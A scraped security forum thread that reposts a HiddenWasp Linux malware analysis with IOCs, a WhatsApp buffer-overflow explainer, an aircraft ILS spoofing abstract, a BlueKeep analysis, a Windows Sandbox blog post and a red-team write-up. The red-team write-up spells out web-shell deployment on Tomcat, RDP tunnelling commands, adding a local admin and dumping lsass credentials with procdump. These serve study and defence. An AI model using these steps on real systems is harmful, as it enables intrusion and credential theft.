The malware will try to load itself from the disk and parse this blob to then retrieve the static encrypted configuration. Once encryption configuration has been successfully retrieved the configuration will be decoded and then parsed as json. The cipher used to encode and decode the configuration is the following: This cipher seems to be an RC4 alike algorithm with an already computed PRGA generated key-stream. It is important to note that this same cipher is used later on in the network communication protocol between trojan clients and their CNCs. After the configuration is decoded the following json will be retrieved: Moreover, if the file is running as root, the malware will attempt to change the default location of the dynamic linker’s LD_PRELOAD path. This location is usually at /etc/ld.so.preload, however there is always a possibility to patch the dynamic linker binary to change this path: Patch_ld function will scan for any existent /lib paths. The scanned paths are the following: The malware will attempt to find the dynamic linker binary within these paths. The dynamic linker filename is usually prefixed with ld-<version number>. Once the dynamic linker is located, the malware will find the offset where the /etc/ld.so.preload string is located within the binary and will overwrite it with the path of the new target preload path, that one being /sbin/.ifup-local. To achieve this patching it will execute the following formatted string by using the xxd hex editor utility by previously having encoded the path of the rootkit in hex: Once it has changed the default LD_PRELOAD path from the dynamic linker it will deploy a thread to enforce that the rootkit is successfully installed using the new LD_PRELOAD path. In addition, the trojan will communicate with the rootkit via the environment variable ‘I_AM_HIDDEN’ to serialize the trojan’s session for the rootkit to apply evasion mechanisms on any other sessions. After seeing the rootkit’s functionality, we can understand that the rootkit and trojan work together in order to help each other to remain persistent in the system, having the rootkit attempting to hide the trojan and the trojan enforcing the rootkit to remain operational. The following diagram illustrates this relationship: Continuing with the execution flow of the trojan, a series of functions are executed to enforce evasion of some artifacts: These artifacts are the following: By performing some OSINT regarding these artifact names, we found that they belong to a Chinese open-source rootkit for Linux known as Adore-ng hosted in GitHub: The fact that these artifacts are being searched for suggests that potentially targeted Linux systems by these implants may have already been compromised with some variant of this open-source rootkit as an additional artifact in this malware’s infrastructure. Although those paths are being searched for in order to hide their presence in the system, it is important to note that none of the analyzed artifacts related to this malware are installed in such paths. This finding may imply that the target systems this malware is aiming to intrude may be already known compromised targets by the same group or a third party that may be collaborating with the same end goal of this particular campaign. Moreover, the trojan communicated with a simple network protocol over TCP. We can see that when connection is established to the Master or Stand-By servers there is a handshake mechanism involved in order to identify the client. With the help of this function we where able to understand the structure of the communication protocol employed. We can illustrate the structure of this communication protocol by looking at a pcap of the initial handshake between the server and client: We noticed while analyzing this protocol that the Reserved and Method fields are always constant, those being 0 and 1 accordingly. The cipher table offset represents the offset in the hardcoded key-stream that the encrypted payload was encoded with. The following is the fixed keystream this field makes reference to: After decrypting the traffic and analyzing some of the network related functions of the trojan, we noticed that the communication protocol is also implemented in json format. To show this, the following image is the decrypted handshake packets between the CNC and the trojan: After the handshake is completed, the trojan will proceed to handle CNC requests: Depending on the given requests the malware will perform different operations accordingly. An overview of the trojan’s functionalities performed by request handling are shown below: 2.3. Prevention and Response Prevention: Block Command-and-Control IP addresses detailed in the IOCs section. Response: We have provided a YARA rule intended to be run against in-memory artifacts in order to be able to detect these implants. In addition, in order to check if your system is infected, you can search for “ld.so” files — if any of the files do not contain the string ‘/etc/ld.so.preload’, your system may be compromised. This is because the trojan implant will attempt to patch instances of ld.so in order to enforce the LD_PRELOAD mechanism from arbitrary locations. 4. Summary We analyzed every component of HiddenWasp explaining how the rootkit and trojan implants work in parallel with each other in order to enforce persistence in the system. We have also covered how the different components of HiddenWasp have adapted pieces of code from various open-source projects. Nevertheless, these implants managed to remain undetected. Linux malware may introduce new challenges for the security community that we have not yet seen in other platforms. The fact that this malware manages to stay under the radar should be a wake up call for the security industry to allocate greater efforts or resources to detect these threats. Linux malware will continue to become more complex over time and currently even common threats do not have high detection rates, while more sophisticated threats have even lower visibility. IOCs 103.206.123[.]13 103.206.122[.]245 http://103.206.123[.]13:8080/system.tar.gz http://103.206.123[.]13:8080/configUpdate.tar.gz http://103.206.123[.]13:8080/configUpdate-32.tar.gz e9e2e84ed423bfc8e82eb434cede5c9568ab44e7af410a85e5d5eb24b1e622e3 f321685342fa373c33eb9479176a086a1c56c90a1826a0aef3450809ffc01e5d d66bbbccd19587e67632585d0ac944e34e4d5fa2b9f3bb3f900f517c7bbf518b 0fe1248ecab199bee383cef69f2de77d33b269ad1664127b366a4e745b1199c8 2ea291aeb0905c31716fe5e39ff111724a3c461e3029830d2bfa77c1b3656fc0 d596acc70426a16760a2b2cc78ca2cc65c5a23bb79316627c0b2e16489bf86c0 609bbf4ccc2cb0fcbe0d5891eea7d97a05a0b29431c468bf3badd83fc4414578 8e3b92e49447a67ed32b3afadbc24c51975ff22acbd0cf8090b078c0a4a7b53d f38ab11c28e944536e00ca14954df5f4d08c1222811fef49baded5009bbbc9a2 8914fd1cfade5059e626be90f18972ec963bbed75101c7fbf4a88a6da2bc671b By Ignacio Sanmillan Nacho is a security researcher specializing in reverse engineering and malware analysis. Nacho plays a key role in Intezer's malware hunting and investigation operations, analyzing and documenting new undetected threats. Some of his latest research involves detecting new Linux malware and finding links between different threat actors. Nacho is an adept ELF researcher, having written numerous papers and conducting projects implementing state-of-the-art obfuscation and anti-analysis techniques in the ELF file format. Sursa: https://www.intezer.com/blog-hiddenwasp-malware-targeting-linux-systems/
      • 1
      • Upvote
  13. How WhatsApp was Hacked by Exploiting a Buffer Overflow Security Flaw Try it Yourself WhatsApp has been in the news lately following the discovery of a buffer overflow flaw. Read on to experience just how it happened and try out hacking one yourself. 10 MINUTE READ WhatsApp entered the news early last week following the discovery of an alarming targeted security attack, according to the Financial Times. WhatsApp, famously acquired by Facebook for $19 billion in 2014, is the world’s most-popular messaging app with 1.5 billion monthly users from 180 countries and has always prided itself on being secure. Below, we’ll explain what went wrong technically, and teach you how you could hack a similar memory corruption vulnerability. Try out the hack First, what’s up with WhatsApp security? WhatsApp has been a popular communication platform for human rights activists and other groups seeking privacy from government surveillance due to the company’s early stance on providing strong end-to-end encryption for all of its users. This means, in theory, that only the WhatsApp users involved in a chat are able to decrypt those communications, even if someone were to hack into the systems running at WhatsApp Inc. (a property called forward secrecy). An independent audit by academics in the UK and Canada found no major design flaws in the underlying Signal Messaging Protocol deployed by WhatsApp. We suspect that the company’s security eminence and focus on baking in privacy comes from the strong security mindset of WhatsApp founder Jan Koum who grew up as a hacker in the w00w00 hacker clan in the 1990s. But WhatsApp was then used for … surveillance? WhatsApp’s reputation as a secure messaging app and its popularity amongst activists made the report of a 3rd party company stealthily offering turn-key targeted surveillance against WhatsApp’s Android and iPhone users all the more disconcerting. The company in question, the notorious and secretive Israeli company the NSO Group, is likely an offshoot of Unit 8200 that was allegedly responsible for the Stuxnet cyberattack against the Iranian nuclear enrichment program, and has recently been under fire for licensing its advanced Pegasus spyware to foreign governments, and allegedly aiding the Saudi regime spy on the journalist Jamal Khashoggi. The severe accusations prompted the NSO co-founder and CEO to give a rare interview with 60 Minutes about the company and its policies. Facebook is now considering legal options against NSO. The initial fear was that the end-to-end encryption of WhatsApp had been broken, but this turned out not to be the case. So what went wrong? Instead of attacking the encryption protocols used by WhatsApp, the NSO Group attacked the mobile application code itself. Following the adage that the chain is never stronger than its weakest link, reasonable attackers avoid spending resources on decrypting communications of their target if they could instead simply hack the device and grab the private encryption keys themselves. In fact, hacking an endpoint device reveals all the chats and dialogs of the target and provides a perfect vantage point for surveillance. This strategy is well known: already in 2014, the exiled NSA whistleblower Edward Snowden hinted at the tactic of governments hacking endpoints rather than focusing on the encrypted messages. According to a brief security advisory issued by Facebook, the attack against WhatsApp was a previously unknown (0-day) vulnerability in the mobile app. A malicious user could initiate a phone call against any WhatsApp user logged into the system. A few days after the Financial Times broke the news of the WhatsApp security breach, researchers at CheckPoint reverse engineered the security patch issued by Facebook to narrow down what code might have contained the vulnerability. Their best guess is that the WhatsApp application code contained what’s called a buffer overflow memory corruption vulnerability due to insufficient checking of length of data. I’ve heard the term buffer overflow. But I don’t really know what it is. To explain buffer overflows, it helps to think about how the C and C++ programming languages approach memory. Unlike most modern programming languages, where the memory for objects is allocated and released as needed, a C/C++ program sees the world as a continuum of 1-byte memory cells. Let’s imagine this memory as a vast row of labeled boxes, sequentially from 0. (Photo by Samuel Zeller on Unsplash) Suppose some program, through dynamic memory allocation, opts to store the name of the current user (“mom”) as the three characters “m”, “o” and “m” in boxes 17000 to 17002. But other data might live in boxes 17003 and onwards. A crucial design decision in C and C++ is that it is entirely the responsibility of the programmer that data winds up in the correct memory cells -- the right set of boxes. Thus if the programmer accidentally puts some part of “mom” inside box 17003, neither the compiler nor the runtime will complain. Perhaps they typed in “mommy”. The program will happily place the extra two characters into boxes 17003 and 17004 without any advance warning, overwriting whatever other potentially important data lives there. But how does this relate to security? Of course, if whatever memory corruption bug the programmer introduced always puts the data erroneously into the extra two boxes 17003 and 17004 with the control flow of the program always impacted, then it’s highly likely that the programmer has already discovered their mistake when testing the program -- the program is bound to fail each time, afterall. But when problems arise only in response to certain unusual inputs, the issues are far more likely to have failed the sniff test and persisted in the code base. Where such overwriting behavior gets interesting for hackers is when the data in box 17003 is of material importance for the program to figure out how the program should continue to run. The formal word is that the overwritten data might affect the control flow of the application. For example, what if boxes 17003 and 17004 contain information about what function in the program should be called when the user logs in? (In C, this might be represented by a function pointer; in C++, this might be a class member function). Suddenly, the path of the program execution can be influenced by the user. It’s like you could tell somebody else’s program, “Hey, you should do X, Y and Z”, and it will abide. If you were the hacker, what would you do with that opportunity? Think about it for a second. What would you do? I would … tell the program to .. take over the computer? You would likely choose to steer the program into a place that would let you get further access, so that you could do some more interactive hacking. Perhaps you could make it somehow run code that would provide remote access to the computer (or phone) on which the program is running. This choice of a payload is the craft of writing a shellcode (code that boots up a remote UNIX shell interface for the hacker, get it?) Two key ideas make such attacks possible. The first is that in the view of a computer, there is no fundamental difference between data and code. Both are represented as a series of bits. Thus it may be possible to inject data into the program, say instead of the string “mommy”, that would then be viewed and executed as code! This is indeed how buffer overflows were first exploited by hackers, first hypothetically in 1972 and then practically by MIT’s Robert T. Morris’s Morris worm that swept the internet in 1988 and Aleph One’s 1996 Smashing the Stack for Fun and Profit article in the underground hacker magazine Phrack. The second idea, which was crystalized after a series of defenses made it difficult to execute data introduced by an attacker as code, is to direct the program to execute a sequence of instructions that are already contained within the program in a chosen order, without directly introducing any new instructions. It can be imagined as a ransom note composed of letter cutouts from newspapers without the author needing to provide any handwriting. (Image generated with Ransomizer.com) Such methods of code-reuse attacks, the most prominent being return-oriented programming (ROP), are the state-of-the-art in binary exploitation and the reason why buffer overflows are still a recurring security problem. Among the reported vulnerabilities in the CVE repository, buffer overflows and related memory corruption vulnerabilities still accounted for 14% of the nearly 19,000 vulnerabilities reported in 2018. Ahh… but what happened with WhatsApp? What the researchers at CheckPoint found by dissecting the WhatsApp security patch were the following highlighted changes to the machine code in the Android app. The code is in the real-time video transmission part of the program, specifically code that pertains to the exchange of information of how well the video of a video call is being received (the RTP Control Protocol (RTCP) feedback channel for the Real-time Transmission Protocol). (Image credit: CheckPoint Research) The odd choices for variable names and structure are artifacts from the reverse engineering process: the source code for the protocol is proprietary. The C++ code might be a heavily modified version of the open-source PJSIP routine that tries to assemble a response to signal a picture loss (PLI) (code is illustrative): int length_argument = /* from incoming RTCP packet */ qmemcpy( &outgoing_rtcp_payload[ offset ], incoming_rtcp_packet, length_argument ); /* Continue building RTCP PLI packet and send */ But if the remaining size of the payload buffer (after offset) is less than the length_argument, a number supplied by the hacker, information from the incoming packet would be shamelessly copied by memcpy over whatever data surrounds outgoing_rtcp_payload ! Just like the situation with the buffer overflow before, these overwritten data could include data that could later direct the control flow of the program, like an overwritten function pointer. In summary (coupled with speculation), a hacker would initiate a video call against an unsuspecting WhatsApp user. As the video channel is being set up, the hacker manipulates the video frames being sent to the victim to force the RTCP code in their app to signal a picture loss (PLI), but only after specially crafting the sent frame so that the lengths in the incoming packet will cause the net size of the RTCP response payload to be exceeded. The control flow of the program is then directed towards executing malicious code to seize control of the app, install an implant on the phone, and then allow the app to continue running. Try it yourself? Buffer overflows are technical flaws, and build on an understanding of how computers execute code. Given how prevalent they are, and important -- as illustrated by the WhatsApp attack, we believe we should all better understand how such bugs are exploited to help us avoid them in the future. In response, we have created a free online lab that puts you in the shoes of the hacker and illustrates how memory and buffer overflows work when you boil them down to their essence. Do you like this kind of thing? Go read about how Facebook got hacked last year and try out hacking it yourself. Learn more about our security training platform for developers at adversary.io Sursa: https://blog.adversary.io/whatsapp-hack/
  14. Wireless Attacks on Aircraft Instrument Landing Systems Harshad Sathaye, Domien Schepers, Aanjhan Ranganathan, and Guevara Noubir Khoury College of Computer Sciences Northeastern University, Boston, MA, USA Abstract Modern aircraft heavily rely on several wireless technologies for communications, control, and navigation. Researchers demonstrated vulnerabilities in many aviation systems. However, the resilience of the aircraft landing systems to adversarial wireless attacks have not yet been studied in the open literature, despite their criticality and the increasing availability of low-cost software-defined radio (SDR) platforms. In this paper, we investigate the vulnerability of aircraft instrument landing systems (ILS) to wireless attacks. We show the feasibility of spoofing ILS radio signals using commerciallyavailable SDR, causing last-minute go around decisions, and even missing the landing zone in low-visibility scenarios. We demonstrate on aviation-grade ILS receivers that it is possible to fully and in fine-grain control the course deviation indicator as displayed by the ILS receiver, in realtime. We analyze the potential of both an overshadowing attack and a lower-power single-tone attack. In order to evaluate the complete attack, we develop a tightly-controlled closed-loop ILS spoofer that adjusts the adversary’s transmitted signals as a function of the aircraft GPS location, maintaining power and deviation consistent with the adversary’s target position, causing an undetected off-runway landing. We systematically evaluate the performance of the attack against an FAA certified flight-simulator (X-Plane)’s AI-based autoland feature, and demonstrate systematic success rate with offset touchdowns of 18 meters to over 50 meters. Download: https://aanjhan.com/assets/ils_usenix2019.pdf
  15. Analysis of CVE-2019-0708 (BlueKeep) By : MalwareTech May 31, 2019 I held back this write-up until a proof of concept (PoC) was publicly available, as not to cause any harm. Now that there are multiple denial-of-service PoC on github, I’m posting my analysis. Binary Diffing As always, I started with a BinDiff of the binaries modified by the patch (in this case there is only one: TermDD.sys). Below we can see the results. A BinDiff of TermDD.sys pre and post patch. Most of the changes turned out to be pretty mundane, except for “_IcaBindVirtualChannels” and “_IcaRebindVirtualChannels”. Both functions contained the same change, so I focused on the former as bind would likely occur before rebinding. Original IcaBindVirtualChannels is on the left, the patched version is on the right. New logic has been added, changing how _IcaBindChannel is called. If the compared string is equal to “MS_T120”, then parameter three of _IcaBindChannel is set to the 31. Based on the fact the change only takes place if v4+88 is “MS_T120”, we can assume that to trigger the bug this condition must be true. So, my first question is: what is “v4+88”?. Looking at the logic inside IcaFindChannelByName, i quickly found my answer. Inside of IcaFindChannelByName Using advanced knowledge of the English language, we can decipher that IcaFindChannelByName finds a channel, by its name. The function seems to iterate the channel table, looking for a specific channel. On line 17 there is a string comparison between a3 and v6+88, which returns v6 if both strings are equal. Therefore, we can assume a3 is the channel name to find, v6 is the channel structure, and v6+88 is the channel name within the channel structure. Using all of the above, I came to the conclusion that “MS_T120” is the name of a channel. Next I needed to figure out how to call this function, and how to set the channel name to MS_T120. I set a breakpoint on IcaBindVirtualChannels, right where IcaFindChannelByName is called. Afterwards, I connected to RDP with a legitimate RDP client. Each time the breakpoint triggered, I inspecting the channel name and call stack. The callstack and channel name upon the first call to IcaBindVirtualChannels The very first call to IcaBindVirtualChannels is for the channel i want, MS_T120. The subsequent channel names are “CTXTW “, “rdpdr”, “rdpsnd”, and “drdynvc”. Unfortunately, the vulnerable code path is only reached if FindChannelByName succeeds (i.e. the channel already exists). In this case, the function fails and leads to the MS_T120 channel being created. To trigger the bug, i’d need to call IcaBindVirtualChannels a second time with MS_T120 as the channel name. So my task now was to figure out how to call IcaBindVirtualChannels. In the call stack is IcaStackConnectionAccept, so the channel is likely created upon connect. Just need to find a way to open arbitrary channels post-connect… Maybe sniffing a legitimate RDP connection would provide some insight. A capture of the RDP connection sequence The channel array, as seen by WireShark RDP parser The second packet sent contains four of the six channel names I saw passed to IcaBindVirtualChannels (missing MS_T120 and CTXTW). The channels are opened in the order they appear in the packet, so I think this is just what I need. Seeing as MS_T120 and CTXTW are not specified anywhere, but opened prior to the rest of the channels, I guess they must be opened automatically. Now, I wonder what happens if I implement the protocol, then add MS_T120 to the array of channels. After moving my breakpoint to some code only hit if FindChannelByName succeeds, I ran my test. Breakpoint is hit after adding MS_T120 to the channel array Awesome! Now the vulnerable code path is hit, I just need to figure out what can be done… To learn more about what the channel does, I decided to find what created it. I set a breakpoint on IcaCreateChannel, then started a new RDP connection. The call stack when the IcaCreateChannel breakpoint is hit Following the call stack downwards, we can see the transition from user to kernel mode at ntdll!NtCreateFile. Ntdll just provides a thunk for the kernel, so that’s not of interest. Below is the ICAAPI, which is the user mode counterpart of TermDD.sys. The call starts out in ICAAPI at IcaChannelOpen, so this is probably the user mode equivalent of IcaCreateChannel. Due to the fact IcaOpenChannel is a generic function used for opening all channels, we’ll go down another level to rdpwsx!MCSCreateDomain. The code for rdpwsx!MCSCreateDomain This function is really promising for a couple of reasons: Firstly, it calls IcaChannelOpen with the hard coded name “MS_T120”. Secondly, it creates an IoCompletionPort with the returned channel handle (Completion Ports are used for asynchronous I/O). The variable named “CompletionPort” is the completion port handle. By looking at xrefs to the handle, we can probably find the function which handles I/O to the port. All references to “CompletionPort” Well, MCSInitialize is probably a good place to start. Initialization code is always a good place to start. The code contained within MCSInitialize Ok, so a thread is created for the completion port, and the entrypoint is IoThreadFunc. Let’s look there. The completion port message handler GetQueuedCompletionStatus is used to retrieve data sent to a completion port (i.e. the channel). If data is successfully received, it’s passed to MCSPortData. To confirm my understanding, I wrote a basic RDP client with the capability of sending data on RDP channels. I opened the MS_T120 channel, using the method previously explained. Once opened, I set a breakpoint on MCSPortData; then, I sent the string “MalwareTech” to the channel. Breakpoint hit on MCSPortData once data is sent the the channel. So that confirms it, I can read/write to the MS_T120 channel. Now, let’s look at what MCSPortData does with the channel data… MCSPortData buffer handling code ReadFile tells us the data buffer starts at channel_ptr+116. Near the top of the function is a check performed on chanel_ptr+120 (offset 4 into the data buffer). If the dword is set to 2, then the function calls HandleDisconnectProviderIndication and MCSCloseChannel. Well, that’s interesting. The code looks like some kind of handler to deal with channel connects/disconnect events. After looking into what would normally trigger this function, I realized MS_T120 is an internal channel and not normally exposed externally. I don’t think we’re supposed to be here… Being a little curious, i sent the data required to trigger the call to MCSChannelClose. Surely prematurely closing an internal channel couldn’t lead to any issues, could it? Oh, no. We crashed the kernel! Whoops! Let’s take a look at the bugcheck to get a better idea of what happened. It seems that when my client disconnected, the system tried to close the MS_T120 channel, which I’d already closed (leading to a double free). Due to some mitigations added in Windows Vista, double-free vulnerabilities are often difficult to exploit. However, there is something better. Internals of the channel cleanup code run when the connection is broken Internally, the system creates the MS_T120 channel and binds it with ID 31. However, when it is bound using the vulnerable IcaBindVirtualChannels code, it is bound with another id. The difference in code pre and post patch Essentially, the MS_T120 channel gets bound twice (once internally, then once by us). Due to the fact the channel is bound under two different ids, we get two separate references to it. When one reference is used to close the channel, the reference is deleted, as is the channel; however, the other reference remains (known as a use-after-free). With the remaining reference, it is now possible to write kernel memory which no longer belongs to us. Sursa: https://www.malwaretech.com/2019/05/analysis-of-cve-2019-0708-bluekeep.html
      • 2
      • Upvote
      • Like
  16. Hari Pulapaka Microsoft ‎12-18-2018 04:18 PM Windows Sandbox Windows Sandbox is a new lightweight desktop environment tailored for safely running applications in isolation. How many times have you downloaded an executable file, but were afraid to run it? Have you ever been in a situation which required a clean installation of Windows, but didn’t want to set up a virtual machine? At Microsoft we regularly encounter these situations, so we developed Windows Sandbox: an isolated, temporary, desktop environment where you can run untrusted software without the fear of lasting impact to your PC. Any software installed in Windows Sandbox stays only in the sandbox and cannot affect your host. Once Windows Sandbox is closed, all the software with all its files and state are permanently deleted. Windows Sandbox has the following properties: Part of Windows – everything required for this feature ships with Windows 10 Pro and Enterprise. No need to download a VHD! Pristine – every time Windows Sandbox runs, it’s as clean as a brand-new installation of Windows Disposable – nothing persists on the device; everything is discarded after you close the application Secure – uses hardware-based virtualization for kernel isolation, which relies on the Microsoft’s hypervisor to run a separate kernel which isolates Windows Sandbox from the host Efficient – uses integrated kernel scheduler, smart memory management, and virtual GPU Prerequisites for using the feature Windows 10 Pro or Enterprise Insider build 18305 or later AMD64 architecture Virtualization capabilities enabled in BIOS At least 4GB of RAM (8GB recommended) At least 1 GB of free disk space (SSD recommended) At least 2 CPU cores (4 cores with hyperthreading recommended) Quick start Install Windows 10 Pro or Enterprise, Insider build 18305 or newer Enable virtualization: If you are using a physical machine, ensure virtualization capabilities are enabled in the BIOS. If you are using a virtual machine, enable nested virtualization with this PowerShell cmdlet: Set-VMProcessor -VMName <VMName> -ExposeVirtualizationExtensions $true Open Windows Features, and then select Windows Sandbox. Select OK to install Windows Sandbox. You might be asked to restart the computer. Using the Start menu, find Windows Sandbox, run it and allow the elevation Copy an executable file from the host Paste the executable file in the window of Windows Sandbox (on the Windows desktop) Run the executable in the Windows Sandbox; if it is an installer go ahead and install it Run the application and use it as you normally do When you’re done experimenting, you can simply close the Windows Sandbox application. All sandbox content will be discarded and permanently deleted Confirm that the host does not have any of the modifications that you made in Windows Sandbox. Windows Sandbox respects the host diagnostic data settings. All other privacy settings are set to their default values. Windows Sandbox internals Since this is the Windows Kernel Internals blog, let’s go under the hood. Windows Sandbox builds on the technologies used within Windows Containers. Windows containers were designed to run in the cloud. We took that technology, added integration with Windows 10, and built features that make it more suitable to run on devices and laptops without requiring the full power of Windows Server. Some of the key enhancements we have made include: Dynamically generated Image At its core Windows Sandbox is a lightweight virtual machine, so it needs an operating system image to boot from. One of the key enhancements we have made for Windows Sandbox is the ability to use a copy of the Windows 10 installed on your computer, instead of downloading a new VHD image as you would have to do with an ordinary virtual machine. We want to always present a clean environment, but the challenge is that some operating system files can change. Our solution is to construct what we refer to as “dynamic base image”: an operating system image that has clean copies of files that can change, but links to files that cannot change that are in the Windows image that already exists on the host. The majority of the files are links (immutable files) and that's why the small size (~100MB) for a full operating system. We call this instance the “base image” for Windows Sandbox, using Windows Container parlance. When Windows Sandbox is not installed, we keep the dynamic base image in a compressed package which is only 25MB. When installed the dynamic base package it occupies about 100MB disk space. Smart memory management Memory management is another area where we have integrated with the Windows Kernel. Microsoft’s hypervisor allows a single physical machine to be carved up into multiple virtual machines which share the same physical hardware. While that approach works well for traditional server workloads, it isn't as well suited to running devices with more limited resources. We designed Windows Sandbox in such a way that the host can reclaim memory from the Sandbox if needed. Additionally, since Windows Sandbox is basically running the same operating system image as the host we also allow Windows sandbox to use the same physical memory pages as the host for operating system binaries via a technology we refer to as “direct map”. In other words, the same executable pages of ntdll, are mapped into the sandbox as that on the host. We take care to ensure this done in a secure manner and no secrets are shared. Integrated kernel scheduler With ordinary virtual machines, Microsoft’s hypervisor controls the scheduling of the virtual processors running in the VMs. However, for Windows Sandbox we use a new technology called “integrated scheduler” which allows the host to decide when the sandbox runs. For Windows Sandbox we employ a unique scheduling policy that allows the virtual processors of the sandbox to be scheduled in the same way as threads would be scheduled for a process. High-priority tasks on the host can preempt less important work in the sandbox. The benefit of using the integrated scheduler is that the host manages Windows Sandbox as a process rather than a virtual machine which results in a much more responsive host, similar to Linux KVM. The whole goal here is to treat the Sandbox like an app but with the security guarantees of a Virtual Machine. Snapshot and clone As stated above, Windows Sandbox uses Microsoft’s hypervisor. We're essentially running another copy of Windows which needs to be booted and this can take some time. So rather than paying the full cost of booting the sandbox operating system every time we start Windows Sandbox, we use two other technologies; “snapshot” and “clone.” Snapshot allows us to boot the sandbox environment once and preserve the memory, CPU, and device state to disk. Then we can restore the sandbox environment from disk and put it in the memory rather than booting it, when we need a new instance of Windows Sandbox. This significantly improves the start time of Windows Sandbox. Graphics virtualization Hardware accelerated rendering is key to a smooth and responsive user experience, especially for graphics-intense or media-heavy use cases. However, virtual machines are isolated from their hosts and unable to access advanced devices like GPUs. The role of graphics virtualization technologies, therefore, is to bridge this gap and provide hardware acceleration in virtualized environments; e.g. Microsoft RemoteFX. More recently, Microsoft has worked with our graphics ecosystem partners to integrate modern graphics virtualization capabilities directly into DirectX and WDDM, the driver model used by display drivers on Windows. At a high level, this form of graphics virtualization works as follows: Apps running in a Hyper-V VM use graphics APIs as normal. Graphics components in the VM, which have been enlightened to support virtualization, coordinate across the VM boundary with the host to execute graphics workloads. The host allocates and schedules graphics resources among apps in the VM alongside the apps running natively. Conceptually they behave as one pool of graphics clients. This process is illustrated below: This enables the Windows Sandbox VM to benefit from hardware accelerated rendering, with Windows dynamically allocating graphics resources where they are needed across the host and guest. The result is improved performance and responsiveness for apps running in Windows Sandbox, as well as improved battery life for graphics-heavy use cases. To take advantage of these benefits, you’ll need a system with a compatible GPU and graphics drivers (WDDM 2.5 or newer). Incompatible systems will render apps in Windows Sandbox with Microsoft’s CPU-based rendering technology. Battery pass-through Windows Sandbox is also aware of the host’s battery state, which allows it to optimize power consumption. This is critical for a technology that will be used on laptops, where not wasting battery is important to the user. Filing bugs and suggestions As with any new technology, there may be bugs. Please file them so that we can continually improve this feature. File bugs and suggestions at Windows Sandbox's Feedback Hub (select Add new feedback), or follows these steps: Open the Feedback Hub Select Report a problem or Suggest a feature. Fill in the Summarize your feedback and Explain in more details boxes with a detailed description of the issue or suggestion. Select an appropriate category and subcategory by using the dropdown menus. There is a dedicated option in Feedback Hub to file "Windows Sandbox" bugs and feedback. It is located under "Security and Privacy" subcategory "Windows Sandbox". Select Next If necessary, you can collect traces for the issue as follows: Select the Recreate my problem tile, then select Start capture, reproduce the issue, and then select Stop capture. Attach any relevant screenshots or files for the problem. Submit. Conclusion We look forward to you using this feature and receiving your feedback! Cheers, Hari Pulapaka, Margarit Chenchev, Erick Smith, & Paul Bozzay (Windows Sandbox team) Sursa: https://techcommunity.microsoft.com/t5/Windows-Kernel-Internals/Windows-Sandbox/ba-p/301849
  17. Exploiting UN-attended Web Servers To Get Domain Admin – Red Teaming MAY 31, 2019|BY MUKUNDA KRISHNA|CYBER SECURITY, ENTERPRISE SECURITY, RED TEAM Note: Images used are all recreated to redact actual target information. Recently, we conducted a remote red team assessment on a large organization and its child companies. This organization was particularly concerned about the security posture of their assets online. This was an organization with multiple child companies working with them, third-party organizations working on-premise as well as remotely to develop new products. The objective was to compromise the domain from their online assets. While we want to this blog to be more on the technical side on how we compromised their network, we also want to point out a few mistakes that large organizations usually make. TIP: It is easy to lose your way during reconnaissance when there is a huge scope and little time is involved. To avoid getting lost keep a track of everything you performed, found & is vulnerable in a place. In reconnaissance, we identified few apache tomcat servers (mostly v7.0.70) running on the target organization’s owned range of IP addresses that seemed interesting. We sprayed few common credentials on these web servers and successfully logged in one of the servers. Later, we came to know that this server was being used by one of the child organizations for debugging applications to remote developers. Upon logging in, we came to know that tomcat was running on a windows server 2012 r2. Now, the easiest way to get command execution would be to upload a JSP web shell on the host server. we used a simple JSP web shell from security risk advisors cmd.jsp to execute commands on the host server. Since tomcat allows deploying web apps in “war” format, we generated a .war file with `jar -cvf example.war cmd.jsp` to blend in with default web apps. After uploading the web shell, we immediately copied existing web shell to examples/jsp/images/somerandomname.jsp to avoid detection and obvious directory brute forcing. We then removed the previously uploaded web shell by un-deploying it. Now that we had command execution and file upload capabilities on the host server, we began enumerating the host server for more information such as user name, current user privileges, current logged in users, host patch level, anti-malware services running on host, host uptime, firewall rules, proxy settings, domain admins etc. Next objective was to gather as much information as possible of the target machine, below is the gathered information: Windows 2012 r2 Virtual machine inside the target domain. Newly launched Tomcat Service running with domain user privileges who is also a member of BUILTIN\Administrators group Latest security patches RDP enabled Daily User activity No SSH Armed with System Centre Endpoint protection and Trend Micro Deep Security. SYSVOL search for credentials didn’t yield satisfactory results. While we had administrative privileges on the host, the web shell interactivity was very limited. The immediate goal was to gain a better foothold on the target host by following either of the methods below: Drop an agent on the disk which slips past a multi-layered firewall, DPI and SOC team monitoring and connects us back with a shell. or use web application server to tunnel traffic to target host over https and reach the internal host’s services like RDP, SMB and other web applications running on the target host. (start a bind shell on the localhost of target host by dropping “nc.exe”, connect to it and get a shell) As 1337 as it sounds, 1 is not always a go-to option, especially when there are heavy egress restrictions and obstacles and you have relatively limited time to complete an assessment. Tunnelling, on the other hand, is much quicker. while there is a caveat of additional work on getting a shell, the advantages like service interaction overshadow this caveat by a large margin. To achieve tunnelling, we used “A Black Path Toward the Sun“(ABPTTS) by Ben Lincoln from NCC group. You can find it here. Ben has done a great job describing the tool and how you can use it on situations like these. we recommend reading the manual before proceeding further. Following is a typical way of tunnelling via ABPTTS. Generate a server-side JSP file with default configuration with: python abttsfactory.py –o tomcat_walkthrough 2. Generated war format of the JSP file. jar -cvf tunnel.jsp abptts.jsp 3. Upload war file. 4. On the attack host, set the ABPTTS client forward all the attack host’s localhost traffic on port 3389 to target host port 3389. python abpttsclient.py –c tomcat_walkthrough/config.txt –u <url-of-uploaded-jsp-server-file> -f 127.0.0.1:3389/127.0.0.1:3389 5. On the attack host run: rdesktop 127.0.0.1 Similar to the above scenario we obtained internal service interaction with the target host. Since we had local administrator privileges, from the web shell we added a new local user on the machine and added the new user to administrators and remote desktop users group. Everything was obvious from here. Now we could log in as a high privileged local user using RDP via tunnelling. While we didn’t have access to the domain yet, this is a huge win already. Next thing is we used resources at hand to gain access to the domain. A typical procedure for this find credentials in the network or the local system. while SYSVOL search was a let-down, we can still extract credentials from the target host (the one compromised earlier). For this, we used Sysinternals’ “ProcDump.exe” to extract the memory contents of lsass.exe and feed it to mimikatz. We uploaded the procdump on the target host and moved it to the newly created user’s desktop. The procdump requires administrator privileges to run. So we opened cmd as an administrator and ran procdump with: procdump.exe -accepteula -ma lsass.exe lsass.dmp Now, comes the tricky part of exfiltrating the dmp file which was well over 50mb. we used fuzzdb’s list.jsp in combination with curl to exfiltrate the file from the web server. List.jsp is a directory and file viewer from fuzzdb. You can find it here. We generated a war and deployed it on the tomcat server. Navigated to where the lsassdump was and copied the URL. Now on the attacking host, using curl, we ran: curl –insecure 